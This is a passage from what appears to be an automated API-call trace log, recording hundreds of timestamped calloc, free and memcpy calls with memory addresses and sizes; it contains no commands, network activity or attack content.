_Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.983] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.983] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.984] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.984] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.985] free (_Block=0x5313d8) [0063.985] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.986] free (_Block=0x5313d8) [0063.986] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.987] free (_Block=0x5313d8) [0063.987] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.987] free (_Block=0x5313d8) [0063.987] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0063.987] free (_Block=0x5313d8) [0063.987] free (_Block=0x2062b70) [0063.987] free (_Block=0x2062c88) [0063.988] free (_Block=0x53fcc0) [0063.988] free (_Block=0x2062fd0) [0063.988] free (_Block=0x2060060) [0063.988] calloc (_Count=0x21, _Size=0x4) returned 0x2061be0 [0063.988] calloc (_Count=0x21, _Size=0x4) returned 0x2061b50 [0063.988] calloc (_Count=0x21, _Size=0x4) returned 0x2061ac0 [0063.988] calloc (_Count=0x21, _Size=0x4) returned 0x2061a30 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20619a0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061910 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061880 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20617f0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061760 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20616d0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061640 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20615b0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061520 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061490 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061400 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2061370 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20612e0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2060950 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x20609e0 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2060a70 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2060b00 [0063.989] calloc (_Count=0x21, _Size=0x4) returned 0x2060b90 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060c20 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060cb0 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060d40 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060dd0 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060e60 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060ef0 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2060f80 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2061010 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x20610a0 [0063.990] calloc (_Count=0x21, _Size=0x4) returned 0x2061130 [0063.999] free (_Block=0x2061be0) [0063.999] free (_Block=0x2061b50) [0063.999] free (_Block=0x2061ac0) [0064.000] free (_Block=0x2061a30) [0064.000] free (_Block=0x20619a0) [0064.000] free (_Block=0x2061910) [0064.001] free (_Block=0x2061880) [0064.001] free (_Block=0x20617f0) [0064.002] free (_Block=0x2061760) [0064.002] free (_Block=0x20616d0) [0064.002] free (_Block=0x2061640) [0064.003] free (_Block=0x20615b0) [0064.003] free (_Block=0x2061520) [0064.003] free (_Block=0x2061490) [0064.003] free (_Block=0x2061400) [0064.004] free (_Block=0x2061370) [0064.004] free (_Block=0x20612e0) [0064.005] free (_Block=0x2060950) [0064.005] free (_Block=0x20609e0) [0064.005] free (_Block=0x2060a70) [0064.006] free (_Block=0x2060b00) [0064.023] free (_Block=0x2060b90) [0064.030] free (_Block=0x2060c20) [0064.031] free (_Block=0x2060cb0) [0064.031] free (_Block=0x2060d40) [0064.031] free (_Block=0x2060dd0) [0064.032] free (_Block=0x2060e60) [0064.032] free (_Block=0x2060ef0) [0064.032] free (_Block=0x2060f80) [0064.032] free (_Block=0x2061010) [0064.033] free (_Block=0x20610a0) [0064.033] free (_Block=0x2061130) [0064.034] free (_Block=0x20611c0) [0064.034] free (_Block=0x2062eb8) [0064.034] calloc (_Count=0x40, _Size=0x4) returned 0x53fcc0 [0064.034] calloc (_Count=0x40, _Size=0x4) returned 0x53fdc8 [0064.034] calloc (_Count=0x20, _Size=0x4) returned 0x53da70 [0064.034] calloc (_Count=0x42, _Size=0x4) returned 0x2062eb8 [0064.034] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.034] calloc (_Count=0x3, _Size=0x4) returned 0x2060060 [0064.034] calloc (_Count=0x41, _Size=0x4) returned 0x2062fd0 [0064.035] free (_Block=0x53fdc8) [0064.035] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0064.035] free (_Block=0x53da70) [0064.035] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0064.035] free (_Block=0x20611c0) [0064.035] calloc (_Count=0x2, _Size=0x4) returned 0x5313e8 [0064.036] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0064.036] free (_Block=0x5313d8) [0064.036] free (_Block=0x5313e8) [0064.036] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.036] free (_Block=0x5313d8) [0064.036] calloc (_Count=0x22, _Size=0x4) returned 0x20611c0 [0064.036] free (_Block=0x2060078) [0064.036] calloc (_Count=0x41, _Size=0x4) returned 0x2062b70 [0064.036] free (_Block=0x20611c0) [0064.037] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.037] free (_Block=0x5313d8) [0064.037] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.037] free (_Block=0x5313d8) [0064.082] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.082] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.082] free (_Block=0x5313d8) [0064.082] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.082] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.082] free (_Block=0x5313d8) [0064.082] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.082] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.085] free (_Block=0x5313d8) [0064.085] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.085] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.085] free (_Block=0x5313d8) [0064.086] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.086] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.086] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.094] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.094] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.094] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.094] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.094] free (_Block=0x5313d8) [0064.094] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.094] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.095] free (_Block=0x5313d8) [0064.095] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.095] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.096] free (_Block=0x5313d8) [0064.096] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.096] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.097] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.097] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.097] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.098] free (_Block=0x5313d8) [0064.098] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.098] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.099] free (_Block=0x5313d8) [0064.099] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.099] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.101] free (_Block=0x5313d8) [0064.101] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.102] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.102] free (_Block=0x5313d8) [0064.102] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.102] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.102] free (_Block=0x5313d8) [0064.102] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.102] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.102] free (_Block=0x5313d8) [0064.102] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.102] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.102] free (_Block=0x5313d8) [0064.102] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.102] memcpy (in: _Dst=0x5313d8, _Src=0x2062b70, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.102] free (_Block=0x5313d8) [0064.102] memcpy (in: _Dst=0x2061250, _Src=0x2062fd0, _Size=0x80 | out: _Dst=0x2061250) returned 0x2061250 [0064.103] free (_Block=0x2062fd0) [0064.103] free (_Block=0x2062c88) [0064.104] free (_Block=0x2062eb8) [0064.104] free (_Block=0x2062b70) [0064.104] free (_Block=0x2060060) [0064.104] calloc (_Count=0x40, _Size=0x4) returned 0x53fdc8 [0064.104] memcpy (in: _Dst=0x53fdc8, _Src=0x53fcc0, _Size=0x100 | out: _Dst=0x53fdc8) returned 0x53fdc8 [0064.104] calloc (_Count=0x20, _Size=0x4) returned 0x53da70 [0064.104] memcpy (in: _Dst=0x53da70, _Src=0x53d838, _Size=0x80 | out: _Dst=0x53da70) returned 0x53da70 [0064.104] calloc (_Count=0x42, _Size=0x4) returned 0x2062b70 [0064.104] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.104] calloc (_Count=0x3, _Size=0x4) returned 0x2060060 [0064.104] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0064.104] memcpy (in: _Dst=0x2062eb8, _Src=0x53fdc8, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0064.105] free (_Block=0x53fdc8) [0064.105] calloc (_Count=0x21, _Size=0x4) returned 0x20611c0 [0064.105] memcpy (in: _Dst=0x20611c0, _Src=0x53da70, _Size=0x80 | out: _Dst=0x20611c0) returned 0x20611c0 [0064.105] free (_Block=0x53da70) [0064.105] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0064.105] memcpy (in: _Dst=0x2062c88, _Src=0x20611c0, _Size=0x84 | out: _Dst=0x2062c88) returned 0x2062c88 [0064.105] free (_Block=0x20611c0) [0064.105] calloc (_Count=0x2, _Size=0x4) returned 0x5313e8 [0064.105] memcpy (in: _Dst=0x5313e8, _Src=0x5313d8, _Size=0x8 | out: _Dst=0x5313e8) returned 0x5313e8 [0064.105] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0064.105] memcpy (in: _Dst=0x2060078, _Src=0x5313d8, _Size=0x8 | out: _Dst=0x2060078) returned 0x2060078 [0064.105] free (_Block=0x5313d8) [0064.105] free (_Block=0x5313e8) [0064.105] calloc (_Count=0x22, _Size=0x4) returned 0x20611c0 [0064.105] memcpy (in: _Dst=0x20611c0, _Src=0x2060078, _Size=0xc | out: _Dst=0x20611c0) returned 0x20611c0 [0064.106] free (_Block=0x2060078) [0064.106] calloc (_Count=0x41, _Size=0x4) returned 0x2062fd0 [0064.106] memcpy (in: _Dst=0x2062fd0, _Src=0x20611c0, _Size=0x88 | out: _Dst=0x2062fd0) returned 0x2062fd0 [0064.106] free (_Block=0x20611c0) [0064.106] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.106] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.106] free (_Block=0x5313d8) [0064.106] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.106] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.106] free (_Block=0x5313d8) [0064.106] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.106] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.106] free (_Block=0x5313d8) [0064.106] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.106] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.106] free (_Block=0x5313d8) [0064.106] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.106] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.106] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.107] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.107] free (_Block=0x5313d8) [0064.107] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) [0064.108] calloc (_Count=0x2, _Size=0x4) returned 0x5313d8 [0064.108] memcpy (in: _Dst=0x5313d8, _Src=0x2062fd0, _Size=0x8 | out: _Dst=0x5313d8) returned 0x5313d8 [0064.108] free (_Block=0x5313d8) 